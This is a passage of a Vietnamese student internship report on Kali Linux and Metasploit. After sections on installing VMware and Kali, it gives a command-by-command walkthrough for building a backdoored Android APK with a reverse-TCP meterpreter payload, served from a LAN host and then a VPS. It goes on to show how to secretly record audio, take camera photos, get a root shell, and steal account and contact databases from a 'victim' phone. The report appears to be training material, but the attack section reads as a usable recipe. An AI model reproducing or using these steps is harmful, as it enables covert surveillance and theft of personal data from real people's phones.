  • 21. Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to- Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ. Tính tương thích kiến trúc Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây. Khả năng tùy biến cao Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). 21 BackTrack, Kali có rất nhiều cải tiến: date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 22. Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa. 3) Cài đặt Vmware và cài đặt Kali trên Vmware Cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.9 64 bit ( Khuyến cao nên dùng phiên bản Kali linux 1.0.9 32 bit, vì bản này thông dụng, phiên bản metasploit framework nhiều hơn bản 64 Bạn là 1 kỹ sư công nghệ thông tin, thì không nhiều thì ít các bạn cũng có sử dụng qua công cụ tạo máy ảo, mình sẽ giới thiệu phần mềm VMware. VMware Workstation là một phần mềm tạo máy ảo hàng đầu. Bạn có thể dùng VMware để tạo 1 máy tính ảo chạy Windows, Linux, Mac OS hay thậm chí là Android nữa. VMware Workstation 10 là một phần mềm giả lập hệ điều hành để bàn rất nổi tiếng của hãng VMware Inc. Với hơn 50 tính năng mới, có thể thay đổi đáng kể cách thức làm việc với các máy ảo. 22 bit). http://ww.kalwi.org/downloads/ Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 23. Để download được Vmware ta có thể download từ nhiều trang khác nhau, ta vào https://www.google.com.vn/ và gõ Vmware 10 thì sẽ search được rất nhiều địa chỉ để ta download. Từ giao diện chính của VMware thì nhấn vào File -> New Vitual Machine (hoặc dùng phím tắt Ctrl + N). 23 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 24. 24 Chọn Custom và nhấn next. Tại bước này ta chọn installer và chọn đĩa iso kali cần cài đặt làm máy ảo Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 25. 25 Chọn tên và chỗ lưu máy ảo Tiếp tục nhấn next, next và chọn thanh ram cho máy ảo Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 26. 26 Tiếp tục ta chọn Use Bridge networking->next Ta chọn LSI logic->next Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 27. 27 Ta chọn SCSI->next Ta chọn Create a new virtual disk->next Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 28. Sau khi nhấn Finish thì máy ảo sẽ tự động bật và sẽ tiến hành cài đặt. Tùy vào ổ cứng ram mà ta chọn cho máy ảo thì sẽ cài đặ nhanh hoặc chậm 28 Tiếp tục nhấn next ,ta chọn dung lượng ổ cứng cho Máy Kali Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 29. Nếu máy tính bạn gặp trường hợp này thì hãy kiểm tra theo từng bước của lỗi.Trường hợp này, máy tính chưa bật chức năng ảo hóa trong Bios, cách xử lí trường hợp này bằng cách, restars máy tính => bấm F2 liên tục để vào Bios tìm mục Advance rồi chỉnh enable intel VT.Khởi động lại và tiếp tục mở Vmware để cài đặt. Bạn sẽ nhìn thấy màn hình khởi động của Kali. Chọn một trong hai chế độ cài đặt là Graphical hoặc Text-Mode. Trong bài viết này tôi sẽ chọn Graphical Install 29 . Nếu máy tính bạn không gặp trường hợp này thì tiếp tục và cài đặt bình thường. Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 30. 30 Chọn ngôn ngữ, vị trí đất nước của bạn sau đó click Continue Chọn nước Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 31. Bạn cũng sẽ được yêu cầu để cấu hình bàn phím với bàn phím bạn đang sử dụng. 31 set Hostname Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 32. 32 set password user root Tiếp đến bạn sẽ lựa chọn ổ đĩa bạn sẽ cài đặt Kali. Partition disks (Step 1) Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 33. 33 Partition disks (Step 2) Partition disks (Step 3) Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 34. 34 Partition disks (Step 4) Partition disks (Step 5) Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 35. 35 Partition disks (Step 6) Sau khi cấu hình Partition xong, nhấn Continue để quá trình cài đặt bắt đầu. Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 36. Cài đặt hệ thống Cấu hình Mirror. Kali sử dụng một kho lưu trữ trung tâm để phân phối các ứng dụng. Bạn sẽ cần phải nhập thông tin proxy thích hợp khi cần thiết. Chú ý: Nếu bạn chọn “No” trong màn hình này, bạn sẽ không thể cài đặt các gói từ kho lưu trữ của Kali. 36 Tiếp đến là cài đặt GRUB Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 37. 37 Cuối cùng, nhấp vào Continue để khởi động lại Kali Màn hình đăng nhập và sau khi bạn đăng nhập vào Kali. Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 38. 38 Giao diện sau khi cài đặt xong Hệ điều hành Kali linux Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 39. Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware. msfpayload android/meterpreter/reverse_tcp lhost=192.168.29.129 lport=8080 Xem địa chỉ máy ip kali bằng cách mở 1 terminal mới và nhập lệnh “ifconfig” và ta Payload là đoạn code mà sẽ chạy trên hệ thống remote machine, là một phần của virus Câu lệnh giúp ta tạo ra 1 phần mềm độc hại tích hợp trên file.apk giúp ta mở ra kết nối với victim (backdoor), nhiệm vụ của haker là gửi cho vicim “files.apk” này, khi victim vô tình tải về “file.apk” ta sẽ có 1 phiên kết nối ngược gửi về địa chỉ host của máy kali : 192.168.29.129 thông qua port 8080 (port websever) 39 Phần 1: Làm trên mạng local Lan 1.Tạo mã độc trên Kali Linux Đầu tiên mở 1 terminal và gõ dòng lệnh: R > /root/Desktop/files.apk sẽ nhận được 1 địa chỉ ip:192.168.29.129 máy tính để thực thi mã độc. Tiếp theo, gõ lệnh msfconsole Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 40. Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách 40 gõ lệnh sau: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.29.129 – [nhập địa chỉ IP giống với khi tạo payload ở trên]. set lport 8080 – [nhập port giống với port khi tạo payload ở trên]. Exploit Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 41. Phần 4 ta đã tạo ra 1 file app.apk chứa mã độc, ta sẽ tung lên mạng, và dùng đt ảo tải file app.apk về. Để cài đặt được app này thì bạn phải check vào ô “Unknown sources” –cho phép cài đặt tất cả các app không rõ nguồn gốc. 41 Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor. 2.Đưa mã độc vào thiết bị android Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 42. Cài đặt files.apk, và mở lên được giao diện như dưới, nhấp vào nút “ReverseTCP ”: 42 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 43. Khi ta nhấp vào ReverseTcp thì lập tức backdoor sẽ mở ra và ta có 1 phiên kết nối với victim. 43  Sử dụng lệnh help.  Sử dụng l ệnh Record_mic: Lưu file ghi âm về máy trong thư mục root Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 44. File hình đã chụp từ camera của máy android là vEYWFBxp.jpeg được lưu ở thư 44  Sử dụng l ệnh Webcam_snap 1 để chụp hình mục root của máy.  Sử dụng l ệnh Webcam_stream Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 45. Dùng lệnh cd /sdcard/Download để vào thư mục và dùng lệnh ls đề liệt kê ra các file có trong thư mục Download. Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download 45  Sử dụng l ệnh Sysinfo: 3.Xâm nhập SD card của thiết bị android Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư mục Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard App.apk. Và file này sẽ được tải về thư mục /root của máy Kali. Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 46. Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local. Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường. VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,…. Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao… Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà 46 Phần 2: Làm trên môi trường VPS 1. Giới thiệu về VPS Định nghĩa Đặc điểm về thông số VPS lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. không cần phải khởi động lại hệ thống. Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. Giá trị khi sử dụng VPS Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 47. Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, Mac OS. 47 hợp. Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh. 2. Cài đặt mã độc trên VPS Giới thi ệu Cài đặt Metasploit Framework Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 48. 48 Các bước tiếp theo ta thực hiện Step-by-Step là được: Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 49. 49 Chọn server và ngày hết hạn, để mặc định: Quá trình cài đặt của Metasploit: Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 50. 50 Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình: Sau khi Finish trình duyệt web mở lên và đi tới giao diện Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 51. Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account: Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn 51 phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 52.  Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang 52 Giao diện chương trình Metasploit Console 3. Từ VPS xâm nhập vào thiết bị Android a. Các bước thực hiện LAN với địa chỉ IP là địa chỉ của VPS Chúng ta vẫn sử dụng lệnh: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R > /root/Desktop/files.apk Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 53. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử dụng chính IP của VPS 53 Ở đây địa chỉ VPS là 14.0.21.162  Khởi động Metasploit Console trên VPS Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 54. b.Tấn công điện thoại Android: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài chục phút. Tiến hành thiết đặt payload bằng các lệnh  “ use exploit/multi/handler ”  “ set payload android/meterpreter/reverse_tcp ”  “ set lhost 14.0.21.162 ”  “ set lport 4444 ”  “show options”  “ run ” Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông báo như sau: 54 trên. Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 55. 55 Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác Ghi âm lén: Sử dụng lệnh: “ record_mic <số giây ghi âm> ” Sử dụng camera: Xem danh sách webcam của thiết bị: “ webcam_list ” Chụp ảnh lén: “webcam_snap <mã camera>” Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 56. Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể tiếp tục tấn công. 56 Tải và xóa file bất kỳ từ bộ nhớ sdcard: Di chuyển vào thư mục bằng lệnh: cd Tải về bằng lệnh: download <tên file> Xóa tập tin bằng lệnh: rm <tên file> Truy cập trực ti ếp vào hệ thống: Truy cập vào hệ thống bằng lệnh: “shell ” > “su” Kiểm tra máy đã root hay chưa bằng lệnh: “whoami ” Truy cập và khai thác tài khoản người dùng: Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l” Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard” Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 57. 57 Trở về meterpreter (Nhấp Ctrl+C) và tải file accounts.db về: Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 58. 58 Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db Truy cập và đánh cắp danh bạ điện thoại: Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại: “cd /data/data/com.android.providers.contacts/databases” Copy về thẻ sdcard và tải về máy Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 59. 59 Xem nội dung của contacts2.db bằng SQLite Manager Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 60. 60 Một số câu l ệnh khác: - Để biết thêm về các lệnh có thể thực hiện ta dùng help - Để xem thông tin về máy, nhập lệnh sysinfo - Để xem các tác vụ đang chạy gõ ps - Xem ip của máy bị hack ta gõ ipconfig - Xem danh sách thư mục, file gõ ls - Để upload gõ lệnh upload - ls -l danh mục file và các quyền - Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 61. 61 /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ - Để xem danh sách và down load các file hay thay đổi các file trong ROM Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data Ctrl + C để quay lại Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 62. - VỆ SINH MÁY TÍNH - SỬA LỖI DISK 100% - SỬA LỖI RAM CHẠY Ì ẠCH, KHIẾN MÁY BỊ TẮT KHI DÙNG VMWARE, Những kinh nghiệm thực tiễn đã tích lũy được: Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao tiếp và ứng xử. 62 C.KẾT QUẢ NHỮNG VIỆC ĐÃ LÀM ĐƯỢC 2 MÁY ẢO ANDROID, MÁY QUAY PHIM BB - KHẮC PHỤC LỖI DÙNG VPS TẤN CÔNG MÁY ANDROID KHÔNG THÀNH CÔNG DO PHIÊN BẢN METASPLOIT CŨ Những kiến thức lý thuyết đã được củng cố:  Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android  Tìm hiểu về hệ điều hành Kali Linux  Tìm hiểu về các lỗ hổng bảo mật của Windows và Android  Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng Những kỹ năng thực hành đã được học thêm:  Thực hiện cài đặt Android trên máy ảo  Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của Windows và Android  Thi lấy chứng chỉ System Hacking của trung tâm Athena  Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào Android  Biết thêm về một số bài học trong lớp Hacker mũ trắng Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 63. http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82-may-android- 110510 63 D .DANH SÁCH CÁC CLIP: - Clip giới thiệu về bản thân và trung tâm Athena: https://www.youtube.com/watch?v=N501TeA2E4g - Clip khó khăn thuận lợi: https://www.youtube.com/watch?v=RPk9iQ_RnPY - Cài Vmware: https://www.youtube.com/watch?v=pZ-e7k87pdk - Cài Kali Linux: https://www.youtube.com/watch?v=P0qA276m754 - Cài Genymotion android ảo: https://www.youtube.com/watch?v=wcRlmx2JNxQ - Tạo mã độc trên Kali linux xâm nhập android ảo đánh cắp dữ liệu: https://www.youtube.com/watch?v=HnW2rjVUx04 - Cài đặt phần mềm chứa mã độc icalendar https://www.youtube.com/watch?v=0mdCkXwMnEc - Tạo mã độc trên VPS cho phép đánh cắp dữ liệu android https://www.youtube.com/watch?v=_JUgsUfIvIU E. PHỤ LỤC : TRÍCH DẪN NGUỒN THAM KHẢO http://sinhvienit.net/forum Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 64. 64 http://forum.bkav.com.vn http://developer.android.com/sdk/index.html#download http://www.oracle.com/technetwork/java/javase/downloads Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086